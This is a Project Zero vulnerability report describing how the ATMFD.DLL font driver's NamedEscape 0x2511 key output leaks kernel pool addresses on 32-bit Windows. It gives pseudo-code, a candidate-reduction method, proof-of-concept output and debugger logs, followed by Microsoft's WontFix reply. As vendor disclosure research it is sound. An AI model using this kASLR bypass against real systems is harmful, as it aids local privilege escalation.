New issue
Advanced search Search tips
Starred by 1 user
Status: WontFix
Owner:
Closed: Nov 15
Cc:



Sign in to add a comment
Windows Kernel ATMFD.DLL NamedEscape 0x2511 pool address derivation from entropy accumulator
Project Member Reported by mjurczyk@google.com, Oct 22 Back to list
The OpenType ATMFD.DLL kernel-mode font driver on Windows has an undocumented "escape" interface, handled by the standard DrvEscape and DrvFontManagement functions implemented by the module. The interface is very similar to Buffered IOCTL in nature, and handles 13 different operation codes in the numerical range of 0x2502 to 0x2514. It is accessible to user-mode applications through an exported (but not documented) gdi32!NamedEscape function, which internally invokes the NtGdiExtEscape syscall.

It is difficult to understand the functionality and design of the various escape codes based on the ATMFD.DLL image alone, as no debug symbols are provided for it on the Microsoft Symbol Server. However, such symbols are available for the ATMLIB.DLL user-mode client library which uses the interface, and more importantly for fontdrvhost.exe, the sandboxed user-mode font driver on Windows 10, which shares most of its code with ATMFD. These two sources of information are invaluable in reverse-engineering the NamedEscape code area. All symbols referenced in this report were originally found in fontdrvhost.pdb, but can also be applied to the corresponding code in ATMFD.

Notably, the NamedEscape interface has already been subject to security vulnerabilities. Project Zero  issue #473  describes a pool-based buffer underflow bug discovered in the HackingTeam dump in 2015 (escape 0x2514, BDGetSIDList), while  issue #785  addresses pool corruption in escape code 0x250c (BDGetGlyphList).

The problem discussed in this report is not due to a programming error, but bad design. It can be triggered via escape code 0x2511 (BDSetHWID), whose functionality is not exactly obvious from the code. Its name ("set hardware id") and the fact that it shares some global objects with functions such as GetPlatformID, fa_VerifyPlatformBinding, fa_VerifyFontLicensing, IsCopyProtectedFont etc. suggests that it is related to some old font copy protection mechanism.

What is important is that with each BDSetHWID call, it is possible to obtain a 32-bit value generated by the GenerateKeyValue() function; this key should then normally be used to encrypt the hardware id passed to the driver. In pseudo-code, the GenerateKeyValue() routine is implemented as follows:

--- cut ---
  DWORD GenerateKeyValue() {
    DWORD tmp = lastMallocAddr ^ bswap32(lastMallocAddr) ^ 0xA4958CD4;
    lastMallocAddr = tmp ^ rol(lastMallocAddr, 5);
    return tmp;
  }
--- cut ---

Here, lastMallocAddr is a global 32-bit variable designed to accumulate entropy, which is then used to generate the key value. The entropy is obtained from addresses returned by the memory allocator, and added to lastMallocAddr in a ATMallocExt() wrapper function. A simplified version of the routine (in pseudo-code) is shown below:

--- cut ---
  PVOID ATMallocExt(SIZE_T size) {
    PVOID address = Allocate(size);
    if (alloc != NULL) {
      lastMallocAddr = (SIZE_T)address ^ rol(lastMallocAddr, 5);
    }
    return address;
  }
--- cut ---

To sum up, the routine mixes in addresses of various memory regions into the global seed, which is partially "accessible" to user-mode clients after a number of transformations. Now, the question is whether it is possible to derive the virtual memory addresses xored into lastMallocAddr by observing the output values of the GenerateKeyValue() function. If it was possible, it would enable local attackers to learn about the kernel address space layout, thus defeating the kASLR mitigation and potentially facilitating privilege escalation attacks using other vulnerabilities.

The first step to achieve the goal is to try and derive the current value of lastMallocAddr; with this, calculating the mixed-in addresses would be relatively simple (xor and rol are reversible operations). Unfortunately, the information returned by GenerateKeyValue() is very limited, specifically due to the following expression:

  lastMallocAddr ^ bswap32(lastMallocAddr)

The above construct means that we don't learn the exact value of lastMallocAddr, but receive a DWORD consisting of the following bytes: [#1 xor #4][#2 xor #3][#2 xor #3][#1 xor #4]. Effectively, we only learn about the relation of bytes #1/#4 and #2/#3, which leaves us at 256*256=65536 potential candidates for lastMallocAddr that could generate the specific seed we obtained. However, let's keep in mind that we can query GenerateKeyValue() multiple times and examine how the values change in time. In order to reduce the number of candidates, we can follow the steps listed below:

  1) Request GenerateKeyValue(), generate the first 65536 candidates.
  2) Request GenerateKeyValue() again, check each existing candidate if it could have resulted in the obtained value in the next iteration. This reduces the set to 2048 candidates.
  3) Repeat step (2). This reduces the set to 256 candidates.

At this point, 256 is the minimum number of candidates we can cut the set down to with the limited information we receive; further iterations keep the list at 256 entries. By keeping track of the candidates throughout steps #1-#3, we can know their values at the beginning of the process, as well as at the end.

Even though it's not possible to determine the state of lastMallocAddr with absolute certainty, let's put this fact aside for a bit and consider how a virtual address could be derived based on it. The most important part is to make sure that ATMallocExt() is called exactly once between our lastMallocAddr measurements. One way to achieve this is with a AddFontResource() call, to trigger the loading of a Type-1 PostScript font with a malformed .PFM file (e.g. with out-of-bounds offsets etc.). An allocation of size 0x308 is then requested at the beginning of the LoadFontInternal() function:

--- cut ---
  .text:00016CC4                 push    1
  .text:00016CC6                 push    308h
  .text:00016CCB                 call    _ATMcalloc
--- cut ---

But before any further allocations are requested, ValidatePFMPointers() fails, causing SetupPFMMetrics() to fail, and later for the whole font loading process to abort without any more ATMallocExt() calls. It's important to note, however, that the user-mode gdi32!AddFontResource() API invokes the NtGdiAddFontResourceW syscall a second time if the first one fails. This is the reason why the system call is used directly in our proof-of-concept program.

To summarize, we're now able to calculate the 256 possible values of lastMallocAddr, mix in a virtual address into the variable, and calculate the new 256 candidates again. Since the malloc transformation is fully reversible, we can just put all 256 before/after candidates against each other, resulting in 256*256=65536 candidates of the returned malloc() address. As it turns out, most of these candidates overlap, leaving us with just 256 unique potential addresses. These 256 32-bit values appear to have uniform bit distribution, so each predefined bit in the address divides the number of candidates by 2.

On 32-bit systems, kernel addresses returned by the allocator are guaranteed to have the highest bit set, and be aligned to 8 bytes (three lowest bits cleared). The knowledge of these four bits cuts the number of candidate addresses down to 16. In our proof-of-concept program, the CheckKernelAddress() function determines if a specific value is a feasible address we intend to leak. If we define it as follows:

--- cut ---
  BOOL CheckKernelAddress(DWORD Address) {
    return ((Address >= 0x80000000) && ((Address & 0x7) == 0));
  }
--- cut ---

Then the output of our PoC in a test run on Windows 7 32-bit is:

--- cut ---
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  Alloc candidates: 16
    87e1afd8
    8fe9a7e0
    97f1bfe8
    9ff9b7f0
    a7c18fb8
    afc987c0
    b7d19fc8
    bfd997d0
    c7a1ef98
    cfa9e7a0
    d7b1ffa8
    dfb9f7b0
    e781cf78
    ef89c780
    f791df88
    ff99d790
--- cut ---

Among those values is 0xff99d790, the actual allocation address, as witnessed in WinDbg:

--- cut ---
  0: kd> g
  Breakpoint 0 hit
  ATMFD+0x1456e:
  9c06456e 8bf8            mov     edi,eax

  3: kd> ? eax
  Evaluate expression: -6695024 = ff99d790

  3: kd> dd eax
  ff99d790  00000000 00000000 00000000 00000000
  ff99d7a0  00000000 00000000 00000000 00000000
  ff99d7b0  00000000 00000000 00000000 00000000
  ff99d7c0  00000000 00000000 00000000 00000000
  ff99d7d0  00000000 00000000 00000000 00000000
  ff99d7e0  00000000 00000000 00000000 00000000
  ff99d7f0  00000000 00000000 00000000 00000000
  ff99d800  00000000 00000000 00000000 00000000

  3: kd> !pool eax
  Pool page ff99d790 region is Paged session pool
  [...]
  *ff99d778 size:  328 previous size:  120  (Allocated) *Adbe
      Pooltag Adbe : Adobe's font driver
  [...]
--- cut ---

In order to further limit the number of possible addresses, we could assume the state of four more bits. The most convenient approach would be to have a large allocation requested (i.e. of size >= ~4096), which would then cause it to be placed at the beginning of a memory page, resulting in pre-determined values of the lowest 12 bits. Unfortunately, during a quick search we were unable to find a primitive making it possible to perform a single large allocation on request, so we had to work with the aforementioned 0x308-long one. On the other hand, we noticed during experimentation that all allocations we examined ended up at an address above 0xfe000000. If we assume that the leaked address will be higher than 0xf8000000 and aligned to 8 bytes, then we have 8 predefined bits and can determine the value of the other 24 bits (so the full address) with full certainty. This is illustrated below.

The CheckKernelAddress() function:

--- cut ---
  BOOL CheckKernelAddress(DWORD Address) {
    return ((Address >= 0xf8000000) && ((Address & 0x7) == 0));
  }
--- cut ---

The proof-of-concept output:

--- cut ---
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  Alloc candidates: 1
    ff980018
--- cut ---

And the WinDbg console log:

--- cut ---
  Breakpoint 0 hit
  ATMFD+0x1456e:
  9c06456e 8bf8            mov     edi,eax

  1: kd> ? eax
  Evaluate expression: -6815720 = ff980018

  1: kd> dd eax
  ff980018  00000000 00000000 00000000 00000000
  ff980028  00000000 00000000 00000000 00000000
  ff980038  00000000 00000000 00000000 00000000
  ff980048  00000000 00000000 00000000 00000000
  ff980058  00000000 00000000 00000000 00000000
  ff980068  00000000 00000000 00000000 00000000
  ff980078  00000000 00000000 00000000 00000000
  ff980088  00000000 00000000 00000000 00000000

  1: kd> !pool eax
  Pool page ff980018 region is Paged session pool
  *ff980000 size:  328 previous size:    0  (Allocated) *Adbe
      Pooltag Adbe : Adobe's font driver
  [...]
--- cut ---

The above example demonstrates that the leak was successful and the kernel address was fully derived based on lastMallocAddr and the GenerateKeyValue() function output. The attack is most useful on 32-bit editions of Windows 7 and 8, as they allow user-mode clients to freely interact with the ATMFD driver and leak the full 32-bit kernel addresses.

On 64-bit platforms, the attack also works, but since the variable types used in BDSetHWID are still 32-bit, it is only possible to leak the lower 32 bits of kernel addresses.

On Windows 10, one can still invoke the NamedEscape code in ATMFD from user space, and so the attack should work in theory. However, since the kernel driver is no longer used to load and parse fonts (the task was offloaded to fontdrvhost.exe), we haven't found a way to trigger the necessary ATMallocExt() call to request the leaked allocation in the first place. One idea around it was to try to leak the addresses returned by the allocator while the driver was loading, but as there are a total of 8 ATMallocEx() calls in the process, the information is combined and lost at the high granularity we're interested in.

The proof-of-concept code is designed for Windows 7 32-bit, but could be easily ported to other systems by adjusting the hardcoded NtGdiAddFontResourceW system call number, or implementing a 64-bit syscall stub (for x64 platforms).

An intuitive way of fixing the bug is to change the source of entropy from kernel addresses to proper crypto API (or some lesser PRNG if high-quality random numbers are not required), or to remove the specific escape code altogether, if it's not used by any user-mode clients anymore.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
 
poc.cpp
6.9 KB View Download
Project Member Comment 1 by mjurczyk@google.com, Oct 22
poc.pfb
2 bytes Download
poc.pfm
106 bytes Download
Project Member Comment 2 by mjurczyk@google.com, Oct 23
Labels: Reported-2017-Oct-23
Project Member Comment 3 by mjurczyk@google.com, Oct 24
Labels: MSRC-41770
Project Member Comment 4 by mjurczyk@google.com, Nov 15
Labels: -Restrict-View-Commit
Status: WontFix
MSRC have responded that the bug is an inherent design weakness that cannot be addressed through a single security update, but would require significant restructuring of the system's address space management. As a result, the case was closed as a security issue on Microsoft's end, but will be tracked to be fixed in a future release of Windows 10.
Sign in to add a comment